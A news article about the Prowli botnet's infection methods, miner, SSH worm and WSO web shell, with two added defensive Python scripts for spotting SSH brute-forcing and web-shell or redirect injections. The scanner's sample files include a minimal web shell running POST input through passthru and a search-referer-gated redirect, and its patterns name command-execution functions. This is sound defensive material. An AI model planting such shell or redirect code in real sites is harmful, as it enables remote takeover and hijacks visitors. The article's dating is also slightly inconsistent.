Saturday, 23 March 2019

Prowli Malware Operation Infected Over 40,000 Servers, Modems, and IoT Devices

Cyber-criminals have managed to assemble a gigantic botnet of over 40,000 infected web servers, modems, and other IoT devices, which they used for cryptocurrency mining, and for redirecting users to malicious sites.
Named Prowli and discovered by the GuardiCore security team, this botnet is a diverse operation that relies on known vulnerabilities and credential brute-force attacks to infect and take over devices.

How the Prowli group infects victims

The following types of servers and devices are known to have been infected by the Prowli group in recent months:

- WordPress sites (via several exploits and admin panel brute-force attacks)
- Joomla! sites running the K2 extension (via CVE-2018-7482)
- Several models of DSL modems (via a well-known vulnerability)
- Servers running HP Data Protector (via CVE-2014-2623)
- Drupal, phpMyAdmin installations, NFS boxes, and servers with exposed SMB ports (all via brute-force credential guessing)

Furthermore, the Prowli group also operates an SSH scanner module that attempts to guess the username and password of devices that expose their SSH port on the Internet.

Crooks deploy cryptocurrency miner, backdoor, SSH scanner

Once servers or IoT devices have been compromised, the Prowli group determines if they can be used for heavy cryptocurrency mining operations.

Those that can are infected with a Monero miner and the r2r2 worm, a malware strain that performs SSH brute-force attacks from the hacked devices, and helps the Prowli botnet expand with new victims.
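The r2r2 worm above, like the SSH scanner module described earlier, is plain credential guessing against SSH ports exposed to the Internet, and that leaves a loud trail in sshd logs. The script below is an added example for this article, not tooling from GuardiCore or anything taken from the Prowli report: it reads standard OpenSSH log messages, flags sources that exceed a failure threshold, and, more usefully, reports any such source that was then accepted, which is the sign that the guessing worked. The log lines, addresses and usernames are constructed for the example.

```python
"""Spot SSH credential brute-forcing, and guesses that succeeded, in sshd log lines.

Added example; not GuardiCore's tooling and not derived from the Prowli report.
Works on the standard OpenSSH messages found in /var/log/auth.log or journald.
"""
import re
from collections import defaultdict

# Standard sshd message formats; the syslog prefix before "sshd[...]:" is skipped by .search().
FAILED_RE = re.compile(
    r"Failed password for (?P<invalid>invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)
ACCEPTED_RE = re.compile(
    r"Accepted (?:password|publickey) for (?P<user>\S+) from (?P<ip>[\d.]+) port \d+"
)

# Constructed sample log, not real traffic: 203.0.113.7 behaves like a credential scanner
# (several accounts tried, then a successful root login); 198.51.100.2 is a user who mistyped once.
SAMPLE_LOG = """\
Jun  1 10:00:01 host sshd[1111]: Failed password for invalid user admin from 203.0.113.7 port 41234 ssh2
Jun  1 10:00:02 host sshd[1112]: Failed password for invalid user test from 203.0.113.7 port 41235 ssh2
Jun  1 10:00:03 host sshd[1113]: Failed password for root from 203.0.113.7 port 41236 ssh2
Jun  1 10:00:04 host sshd[1114]: Failed password for root from 203.0.113.7 port 41237 ssh2
Jun  1 10:00:05 host sshd[1115]: Failed password for invalid user pi from 203.0.113.7 port 41238 ssh2
Jun  1 10:00:06 host sshd[1116]: Accepted password for root from 203.0.113.7 port 41239 ssh2
Jun  1 10:05:00 host sshd[1117]: Failed password for alice from 198.51.100.2 port 50000 ssh2
Jun  1 10:05:05 host sshd[1118]: Accepted publickey for alice from 198.51.100.2 port 50001 ssh2
"""


def analyse(log_text, threshold=5):
    """Return {"brute_force": {ip: stats}, "compromised": [(ip, user, line_no)]}.

    A source is brute-forcing once it has at least `threshold` failed logins. It is reported
    as compromised when an Accepted line follows at least `threshold` failures from the same
    address, i.e. one of the guesses worked. Lines are processed in order, so the count is
    the number of failures seen *before* the success.
    """
    fail_count = defaultdict(int)
    users_tried = defaultdict(set)
    invalid_users = defaultdict(set)
    compromised = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = FAILED_RE.search(line)
        if m:
            fail_count[m["ip"]] += 1
            users_tried[m["ip"]].add(m["user"])
            if m["invalid"]:
                invalid_users[m["ip"]].add(m["user"])
            continue
        m = ACCEPTED_RE.search(line)
        if m and fail_count[m["ip"]] >= threshold:
            compromised.append((m["ip"], m["user"], line_no))
    brute_force = {
        ip: {
            "failures": n,
            "distinct_users": len(users_tried[ip]),
            "invalid_users": sorted(invalid_users[ip]),
        }
        for ip, n in fail_count.items()
        if n >= threshold
    }
    return {"brute_force": brute_force, "compromised": compromised}


if __name__ == "__main__":
    import json
    import sys

    # Pipe a real auth.log in, or run with no input to analyse the constructed sample.
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_LOG
    print(json.dumps(analyse(text), indent=2))
```

A high count of distinct usernames from one address, especially "invalid user" names, separates a scanner from a legitimate user who forgot a password; a success after such a run is the line to act on first, since it means the box is now part of the worm's next hop.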

Furthermore, CMS platforms that are used to run websites receive special treatment, because they are also infected with a backdoor (the WSO Web Shell).

The crooks used this web shell to modify the compromised websites to host malicious code that redirects some of the site's visitors to a traffic distribution system (TDS), which then rents out the hijacked web traffic to other crooks and redirects users to all sorts of malicious sites, such as tech support scams, fake update sites, and more.
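One practical check for the web-shell and redirect-injection step described above, as an added example that is not GuardiCore's code and takes no indicators from their report: a Python triage script that scans site files for generic web-shell constructs (eval over decoded blobs, request parameters passed straight to a shell), two commonly reported WSO strings (FilesMan and WSO_VERSION, assumed here as markers of that shell family), redirects that fire only for some visitors by keying on the referer or user agent, and script tags that load from a host other than the site's own. The file contents, paths and host names are constructed for the example; scan_tree() runs the same checks over a real document root.

```python
"""Triage web-site files for web-shell and injected-redirect indicators.

Added example; not tooling from GuardiCore or the Prowli report. The WSO strings are
commonly reported markers of that shell family and the rest are generic constructs;
treat every hit as something to confirm by hand, not as a verdict.
"""
import os
import re
from urllib.parse import urlparse

INDICATORS = {
    # Assumed WSO markers (its file-manager action name and version constant).
    "wso_marker": re.compile(r"\bFilesMan\b|\bWSO_VERSION\b"),
    # eval() over a decoded/inflated blob: the usual way to hide a shell's body.
    "obfuscated_eval": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("
    ),
    # Request parameter handed straight to a command-execution function.
    "request_to_exec": re.compile(
        r"\b(?:system|exec|passthru|shell_exec|popen)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"
    ),
    # Redirect gated on referer/user agent within a short distance: feeds a TDS only some visitors.
    "conditional_redirect": re.compile(
        r"\$_SERVER\[\s*['\"]HTTP_(?:REFERER|USER_AGENT)['\"]\s*\][\s\S]{0,300}?"
        r"header\s*\(\s*['\"]Location:",
        re.IGNORECASE,
    ),
}
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\ssrc\s*=\s*['\"](?P<src>[^'\"]+)['\"]", re.IGNORECASE)

# Constructed sample site (paths and content made up for this example).
SAMPLE_FILES = {
    # Clean theme footer: only a local script.
    "wp-content/themes/site/footer.php": """<?php wp_footer(); ?>
<script src="/wp-includes/js/jquery/jquery.js"></script>
</body></html>
""",
    # Header with an injected conditional redirect plus an off-site loader.
    "wp-content/themes/site/header.php": """<?php
if (strpos($_SERVER['HTTP_REFERER'], 'google.') !== false && !isset($_COOKIE['seen'])) {
    setcookie('seen', '1', time() + 86400);
    header('Location: http://tds.invalid/go?sid=1');
    exit;
}
?><!DOCTYPE html><html><head>
<script src="//static.invalid/l.js"></script>
""",
    # Dropped shell hiding in the uploads directory.
    "wp-content/uploads/2018/05/cache.php": """<?php
$default_action = 'FilesMan';
eval(base64_decode('ZWNobyAnaGVsbG8nOw=='));
if (isset($_POST['c'])) { passthru($_POST['c']); }
""",
}


def scan_content(content, own_hosts):
    """Return the sorted indicator names matching one file's text."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(content)]
    for m in SCRIPT_SRC_RE.finditer(content):
        host = urlparse(m["src"]).hostname  # None for relative paths
        if host and host.lower() not in own_hosts:
            hits.append("offsite_script")
            break
    return sorted(hits)


def scan_files(files, own_hosts):
    """files: {path: content}. Returns {path: hits} for files with at least one hit."""
    own = {h.lower() for h in own_hosts}
    report = {}
    for path, content in files.items():
        hits = scan_content(content, own)
        if hits:
            report[path] = hits
    return report


def scan_tree(root, own_hosts, exts=(".php", ".js", ".html", ".htm")):
    """Walk a real document root (e.g. a WordPress install) and scan matching files."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    files[path] = fh.read()
    return scan_files(files, own_hosts)


if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES, {"www.example.org"}).items():
        print(path, ", ".join(hits))
```

The referer-gated redirect is the part worth understanding: because it only fires for visitors arriving from a search engine and sets a cookie so they are not bounced twice, the site owner browsing directly never sees it, which is why such injections survive for months. Pair this with the indicators GuardiCore published and with file-integrity checks against a clean copy of the CMS.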

According to GuardiCore, the TDS the crooks worked with was EITest, also known as ROI777. That service was taken down by cyber-security firms in April after ROI777 was hacked in March and some of its data dumped online. Nonetheless, this doesn't seem to have stopped Prowli, which continued to operate afterward.

A money-making machine

The big picture, according to researchers, is that the entire Prowli operation was intentionally designed and optimized to maximize profits for crooks.

During its lifetime, Prowli malware infected over 40,000 servers and devices located on the networks of over 9,000 companies, which the group then used to their full potential to earn money before the malware was discovered. Prowli operated without discrimination and made victims all over the world, regardless of the underlying platform.

The GuardiCore report on the Prowli group contains indicators of compromise and other details that system administrators can utilize to determine if their IT network has been compromised by this threat.
